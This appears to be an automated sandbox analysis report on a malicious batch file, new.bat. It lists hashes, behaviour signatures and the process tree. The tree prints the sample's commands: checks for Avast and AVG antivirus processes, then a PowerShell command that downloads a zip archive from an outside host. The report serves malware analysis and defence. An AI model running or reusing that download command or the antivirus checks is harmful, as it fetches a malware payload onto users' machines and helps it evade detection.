Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
16-12-2024 17:23
Static task
static1
Behavioral task
behavioral1
Sample
new.bat
Resource
win7-20240729-en
windows7-x64
5 signatures
150 seconds
General
-
Target
new.bat
-
Size
4KB
-
MD5
b79e56969d36c4b969bbe1623142e74a
-
SHA1
a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd
-
SHA256
6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960
-
SHA512
fb9df37d81d5a9e8fa4500db392df29c4e7e8017cb9705277da7e1a2f0eb3b9df529c657174488998ba5cb82fb51149d31e666190c6de7e86773ac8e7711a356
-
SSDEEP
96:EDONgDQ901HqmgGM5olT539rHZdrMkSKHUEeW05qy:EDpDe01HqGO5j
Malware Config
Signatures
-
pid Process 2420 powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2164 tasklist.exe 2700 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2420 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2164 tasklist.exe Token: SeDebugPrivilege 2700 tasklist.exe Token: SeDebugPrivilege 2420 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2848 wrote to memory of 2164 2848 cmd.exe 32 PID 2848 wrote to memory of 2164 2848 cmd.exe 32 PID 2848 wrote to memory of 2164 2848 cmd.exe 32 PID 2848 wrote to memory of 2656 2848 cmd.exe 33 PID 2848 wrote to memory of 2656 2848 cmd.exe 33 PID 2848 wrote to memory of 2656 2848 cmd.exe 33 PID 2848 wrote to memory of 2700 2848 cmd.exe 35 PID 2848 wrote to memory of 2700 2848 cmd.exe 35 PID 2848 wrote to memory of 2700 2848 cmd.exe 35 PID 2848 wrote to memory of 2692 2848 cmd.exe 36 PID 2848 wrote to memory of 2692 2848 cmd.exe 36 PID 2848 wrote to memory of 2692 2848 cmd.exe 36 PID 2848 wrote to memory of 2420 2848 cmd.exe 37 PID 2848 wrote to memory of 2420 2848 cmd.exe 37 PID 2848 wrote to memory of 2420 2848 cmd.exe 37
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq AvastUI.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\system32\find.exefind /i "AvastUI.exe"2⤵PID:2656
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\system32\find.exefind /i "avgui.exe"2⤵PID:2692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://dbasopma.one:6049/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-